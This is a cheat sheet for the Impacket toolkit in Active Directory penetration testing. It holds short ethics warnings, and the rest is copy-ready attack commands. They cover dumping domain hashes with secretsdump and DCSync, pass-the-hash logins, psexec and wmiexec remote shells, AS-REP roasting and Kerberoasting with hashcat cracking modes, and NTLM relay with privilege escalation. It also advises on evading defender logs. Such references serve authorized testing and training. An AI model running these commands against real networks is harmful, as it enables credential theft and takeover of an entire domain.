Impacket Cheat Sheet

Python toolkit for SMB, Kerberos, and Windows protocol attacks.

Active Directory & WindowsadkerberosrelaysecretssmbUpdated 2026-06-02

Overview

Impacket provides scripts used daily in AD testing: remote execution, hash extraction, Kerberoasting, and NTLM relay. Ethics: secretsdump, relay, and remote exec are destructive and logged—authorized lab or explicit pentest scope only. Never run relay or DCSync against systems you do not own or have written permission to test.

Install

sudo apt install impacket-scripts

or pip:

pip install impacket

impacket-secretsdump -h

Essential commands

List examples

ls /usr/share/doc/python3-impacket/examples/ 2>/dev/null

impacket-psexec -h

Common workflows

Remote (admin creds)

impacket-secretsdump corp.local/administrator:'Password1!'@10.10.10.10

Pass-the-hash

impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 corp.local/admin@10.10.10.10

Local SAM/SECURITY/SYSTEM offline

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

NTDS.dit offline

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

psexec — remote shell —

impacket-psexec corp.local/administrator:'Password1!'@10.10.10.10

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.10

wmiexec — WMI shell (often quieter) —

impacket-wmiexec corp.local/user:'Password1!'@10.10.10.10

impacket-wmiexec -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@10.10.10.10 'hostname'

GetNPUsers — AS-REP roast (no preauth) —

impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1

impacket-GetNPUsers corp.local/user -no-pass -dc-ip 10.10.10.1

Listener on attacker (authorized lab!)

impacket-ntlmrelayx -t ldap://10.10.10.1 -smb2support --escalate-user lowpriv

Relay to SMB

impacket-ntlmrelayx -tf targets.txt -smb2support

With SOCKS / WebDAV (check version docs)

impacket-ntlmrelayx -t smb://10.10.10.20 -smb2support -socks

Other high-value scripts —

impacket-GetUserSPNs corp.local/user:'Pass' -dc-ip 10.10.10.1 -request

impacket-getTGT corp.local/user:'Pass'

impacket-getST -spn cifs/dc01.corp.local corp.local/user:'Pass'

impacket-smbclient corp.local/user:'Pass'@10.10.10.5

Flags: secretsdump.py

`-just-dc-user krbtgt`	DCSync one account
`-just-dc`	DCSync all domain hashes
`-pwd-last-set`	Show pwdLastSet when dumping
`-outputfile out.txt`	Write hashes to file

Flags: psexec.py / wmiexec.py

`-codec cp850`	Output encoding (psexec)
`-target-ip 10.10.10.5`	Connect by IP
`-silentcommand`	No echo of command output (wmiexec)

Flags: GetNPUsers.py

`-no-pass`	Do not ask for password (user list only)
`-dc-ip 10.10.10.1`	Domain controller IP
`-request`	Request TGTs for crackable AS-REP hashes

Flags: ntlmrelayx.py

`-t smb://10.10.10.5`	Relay target
`--escalate-user`	Attempt privilege escalation on relay
`-smb2support`	Use SMB2

Tips

Ethics: DCSync and relay can domain-compromise in minutes—get sign-off; disable IPv6 mitigations only in lab.
Use -k Kerberos when you have tickets; -no-pass with -hashes for PTH.
Defender sees 7045, 4624, and RPC patterns—prefer wmiexec/smbexec per opsec notes in scope.
After GetNPUsers / Kerberoast, crack with hashcat -m 18200 / -m 13100.